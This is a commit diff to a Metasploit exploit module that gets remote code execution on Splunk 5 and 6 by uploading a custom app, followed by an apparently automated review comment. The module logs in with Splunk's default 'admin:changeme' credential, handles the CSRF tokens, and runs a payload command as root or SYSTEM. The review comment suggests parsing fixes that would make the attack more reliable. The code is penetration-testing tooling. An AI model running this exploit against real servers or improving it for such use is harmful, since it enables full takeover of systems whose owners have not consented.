Add #3463 commits from @ghost

bug/bundler_fix
Gary Blosser 2014-07-09 17:56:06 -04:00 committed by Rob Fuller
parent 4eeab66ebe
commit c14b96f02e
1 changed files with 25 additions and 11 deletions


@ -12,7 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'Splunk 5.0 Custom App Remote Code Execution',
'Name' => 'Splunk Custom App Remote Code Execution',
'Description' => %q{
This module exploits a feature of Splunk whereby a custom application can be
uploaded through the web based interface. Through the 'script' search command a
@ -20,14 +20,15 @@ class Metasploit3 < Msf::Exploit::Remote
perl or python code. To abuse this behavior, a valid Splunk user with the admin
role is required. By default, this module uses the credential of "admin:changeme",
the default Administrator credential for Splunk. Note that the Splunk web interface
runs as SYSTEM on Windows, or as root on Linux by default. This module has only
been tested successfully against Splunk 5.0.
runs as SYSTEM on Windows, or as root on Linux by default. This module has been
tested successfully against Splunk 5.0, 6.1, and 6.1.1.
},
'Author' =>
[
"marcwickenden", # discovery and metasploit module
"sinn3r", # metasploit module
"juan vazquez" # metasploit module
"juan vazquez", # metasploit module
"Gary Blosser" # metasploit module updates for Splunk 6.1
],
'License' => MSF_LICENSE,
'References' =>
@ -44,13 +45,13 @@ class Metasploit3 < Msf::Exploit::Remote
'Platform' => %w{ linux unix win },
'Targets' =>
[
[ 'Splunk 5.0.1 / Linux',
[ 'Splunk >= 5.0.1 / Linux',
{
'Arch' => ARCH_CMD,
'Platform' => %w{ linux unix }
}
],
[ 'Splunk 5.0.1 / Windows',
[ 'Splunk >= 5.0.1 / Windows',
{
'Arch' => ARCH_CMD,
'Platform' => 'win'
@ -96,6 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote
# set up some variables for later use
@auth_cookies = ''
@csrf_form_key = ''
@csrf_form_port = "splunkweb_csrf_token_#{rport}" #Default to using rport, corrected during tokenization for v6 below.
app_name = 'upload_app_exec'
p = payload.encoded
print_status("Using command: #{p}")
@ -121,11 +123,11 @@ class Metasploit3 < Msf::Exploit::Remote
{
'uri' => '/en-US/api/search/jobs',
'method' => 'POST',
'cookie' => @auth_cookies,
'cookie' => "#{@auth_cookies}; #{@csrf_form_port}=#{@csrf_form_key}", # Version 6 uses cookies and not just headers, extra cookies should be ignored by Splunk 5 (unverified)
'headers' =>
{
'X-Requested-With' => 'XMLHttpRequest',
'X-Splunk-Form-Key' => @csrf_form_key
'X-Splunk-Form-Key' => @csrf_form_key # Version 6 ignores extra headers (verified)
},
'vars_post' =>
{
@ -239,7 +241,7 @@ class Metasploit3 < Msf::Exploit::Remote
res.get_cookies.split(';').each {|c|
c.split(',').each {|v|
if v.split('=')[0] =~ /session_id/
session_id_port = v.split('=')[0]
session_id_port = v.split('=')[0]
session_id = v.split('=')[1]
end
}
@ -274,7 +276,7 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request_cgi({
'uri' => '/en-US/manager/appinstall/_upload',
'method' => 'POST',
'cookie' => @auth_cookies,
'cookie' => "#{@auth_cookies}; #{@csrf_form_port}=#{@csrf_form_key}", # Does not seem to require the cookie, but it does not break it. I bet 6.2 will have a cookie here too.
'ctype' => "multipart/form-data; boundary=#{boundary}",
'data' => data
}, 30)
@ -294,8 +296,20 @@ class Metasploit3 < Msf::Exploit::Remote
'method' => 'GET',
'cookie' => @auth_cookies
})
res.body.match(/FORM_KEY":\ "(\d+)"/)
res.body.match(/FORM_KEY":\ "(\d+)"/) # Version 5
@csrf_form_key = $1
unless @csrf_form_key # Version 6
res.get_cookies.split(';').each {|c|
c.split(',').each {|v|
if v.split('=')[0] =~ /splunkweb_csrf_token/ #regex as the full name is something like splunkweb_csrf_token_8000
@csrf_form_port = v.split('=')[0] # Accounting for tunnels where rport is not the actual server-side port
@csrf_form_key = v.split('=')[1]
end
}
}
end
fail_with(Failure::Unknown, "csrf form Key not found") if not @csrf_form_key
end
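Review bot: The Version 6 cookie scan copies the cookie name into `@csrf_form_port` without trimming, so if `get_cookies` joins cookies with `; ` (as the `split(';')` suggests) every name after the first carries a leading space, and that space is then interpolated into the `Cookie` header built in the `/en-US/api/search/jobs` and `/_upload` hunks above; a plain `split('=')` also drops anything after a second `=` in the value. Changing the two assignments to `@csrf_form_port = v.split('=')[0].strip` and `@csrf_form_key = v.split('=', 2)[1]` keeps the header well-formed and the token intact, and it is worth a comment that `@csrf_form_port` holds the cookie *name*, not a port. The trailing check reads more idiomatically as `fail_with(Failure::Unknown, "csrf form Key not found") unless @csrf_form_key`. The method this hunk patches begins outside the hunk.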